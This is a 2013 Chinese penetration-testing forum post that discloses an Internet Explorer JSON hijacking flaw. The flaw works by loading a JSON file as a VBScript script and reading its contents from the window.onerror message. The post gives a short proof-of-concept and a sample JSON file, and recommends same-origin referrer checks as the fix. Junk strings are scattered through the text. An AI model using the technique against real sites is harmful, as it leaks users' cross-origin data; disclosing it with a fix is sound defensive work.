中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
V6 r+ u p2 [7 C8 _/ r1 H0 P
7 K4 q8 ?2 Q) f5 L/ X( ^
由于某些资源容器对数据处理不当导致json劫持漏洞.
. L6 n# O Z+ B2 s9 ~( b
详细说明:
% b& Q% Q$ X" R( g" T; G1 c. ?
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
1 W. z2 h3 v" v5 w8 X0 z
<script language=vbscript></script>
1 D3 B' l9 H, x
6 ]) t8 @. v4 h7 a
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
1 y! O1 J9 ]4 d6 j% k
漏洞证明:
% u" v& H+ C+ J- j1 B6 z2 ]; H
<script>
( y! D0 K8 i) K* s* C: ^
window.onerror=function(_){
( Z! Z1 g. m! w( U6 H
alert(_)
$ K& L8 R% M' g2 ?# f' x
}
& C* w" \2 Q6 A' \) W
</script>
. I; m. ?1 d+ r2 `' B' i
<script language=vbscript src=1.json></script>
9 f1 Y" e4 @! M4 B+ @* B0 E
# {) D4 C# K3 K# f
/ X) I- \! Z" I( X
1.json:
: W. G d7 g# `8 K- V
[{"name":"sogili","age":19}]
& m( T7 G2 N- |) B
修复方案:
! k, S( ^0 g4 k
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2